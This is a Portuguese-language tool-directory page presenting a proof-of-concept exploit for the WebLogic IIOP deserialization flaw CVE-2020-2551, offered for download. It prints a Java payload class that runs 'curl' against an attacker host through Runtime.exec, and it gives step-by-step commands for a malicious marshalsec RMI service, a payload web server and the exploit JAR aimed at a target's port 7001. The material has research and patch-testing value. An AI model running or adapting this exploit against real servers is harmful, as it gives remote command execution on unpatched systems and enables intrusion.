Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
Ferramentas/GitHubGitHub/y4er/cve-2020-2551
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebComando e ControleFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

Ver Repositório
33678há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-2551

Weblogic IIOP Deserialização

Ambiente de Teste

Weblogic10.3.6+jdk1.6

JAR empacotado Código de extração: a6ob

Exploração da Vulnerabilidade

Baixe o JAR, então use o marshalsec para iniciar um serviço RMI malicioso e compile um exp.java localmente.

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Tente usar a mesma versão do JDK e as mesmas bibliotecas de dependência (wlfullclient.jar) do Weblogic para compilar então inicie um servidor web localmente.

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

Execute o JAR na linha de comando:

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

Resultado real conforme mostrado: image

Problemas Conhecidos

Muitos colegas relataram que a reprodução não foi bem-sucedida. Após ler alguns artigos online, descobri que o IIOP tem um problema com modo NAT. Hoje, encontrei https://xz.aliyun.com/t/7498 no Xianzhi — sigam por conta própria.

Referências

https://y4er.com/post/weblogic-cve-2020-2551/

Baixar ferramenta